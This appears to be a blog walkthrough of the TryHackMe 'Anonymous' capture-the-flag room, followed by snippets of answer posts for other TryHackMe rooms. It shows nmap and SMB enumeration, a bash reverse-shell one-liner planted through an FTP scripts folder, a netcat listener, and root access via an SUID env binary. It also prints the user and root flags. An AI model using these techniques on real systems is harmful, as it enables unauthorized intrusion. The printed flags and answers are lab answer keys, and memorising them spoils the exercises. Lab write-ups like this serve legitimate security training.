Skip to main content


 Tryhackme - Anonymous

NMAP - Network mapper

#1 - Enumerate the machine. How many ports are open?

# nmap -sC -vv -A

Nmap scan:


#2 - What service is running on port 21?

ANSWER - ftp

#3 - What service is running on ports 139 and 445?

ANSWER - smb

#4 - There’s a share on the user’s computer. What’s it called?

#smbclient -L


ANSWER - pics

#5 - user.txt

bash -i >& /dev/tcp/ 0>&1

Connect to the FTP server again:

cd scripts
Now set up a netcat listener on the specified port: 

#nc - nvlp 4444                                                       
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 54700
bash: cannot set terminal process group (1399): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$ ls
namelessone@anonymous:~$ cat user.txt
cat user.txt


user flag - 90d6f992585815ff991e68748c414740

I tried to check my privileges with sudo -l but as I don’t have the user’s password, it failed. Let’s check what programs are owned by root with the SUID bit set:

Privilege Escalation

sudo -l doesn’t work so let’s check the SUID binaries. If you are unsure about finding and exploiting SUID binaries

To get a list of all SUID binaries, execute the following command:

#find / -user root -perm -u=s 2>/dev/null

/usr/bin/env   <--- here

GTFOBins ( reveals a potential privilege escalation:

namelessone@anonymous:~$ env /bin/sh -p
# whoami
# cd /root
# ls
# cat root.txt  

root flag - 4d930091c31a622a7ed10f27999af363



Popular posts from this blog

Windows Fundamentals 2

 TryHackMe - Windows Fundamentals 2 Task 1 Introduction  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed Task 2 System Configuration   #2.1 :- What is the name of the service that lists Systems Internals as the manufacturer?  Answer :- PsShutdown #2.2 :- Whom is the Windows license registered to? Answer :- Windows User #2.3 :- What is the command for Windows Troubleshooting? Answer :- C:\Windows\System32\control.exe /name Microsoft.Troubleshooting #2.4 :- What command will open the Control Panel? (The answer is  the name of .exe, not the full path) Answer :- control.exe Task 3 Change UAC Settings  #3 :- What is the command to open User Account Control Settings? (The answer is the name of the .exe file, not the full path)  Answer :- UserAccountControlSettings.exe Task 4 Computer Management  #4.1 :- What is the command to open Computer Management? (The answer is the name of the .msc file, not the full

Windows Fundamentals 3

 Tryhackme - Windows Fundamentals 3   Task-1 Introduction  #1:- Read the above and start the virtual machine.  Answer:- No Answer Needed Task-2 Windows Updates  #2:- There were two definition updates installed in the attached VM. On what date were these updates installed?  Answer:- 5/3/2021 Task-3 Windows Security  #3:- In the above image, which area needs immediate attention?  Answer:- virus & threat protection Task-4 Virus & threat protection  #4:- Specifically, what is turned off that Windows is notifying you to turn on?  Answer:- Real-time protection Task-5 Firewall & network protection  #5:- If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?  Answer:- public network Task-6 App & browser control  #6:- Read the above.  Answer:- No Answer Needed Task-7 Device security  #7:- What is the TPM?  Answer:- Trusted Platform Module Task-8 BitLocker #8:- What must a user insert on computers that DO NOT have a TPM version 1.2 or la

Linux Fundamentals Part 1

TryHackMe - Linux FundamentalsPart 1  #1 :- Research: What year was the first release of a Linux operating system?  Answer :-1991  #2 :- if we wanted to output the text "TryHackMe", what would our command be?  Answer :-echo TryHackMe  #3 :- What is the username of who you're logged in as on your deployed Linux machine? Answer :-tryhackme #4 :- On the Linux machine that you deploy, how many folders are there?    Answer :-2 #5 :- Which directory contains a file?  Answer :-folder4 #6 :- What is the contents of this file? Answer :-Hello World #7 :- Use the cd command to navigate to this file and find out the new current working directory. What is the path? An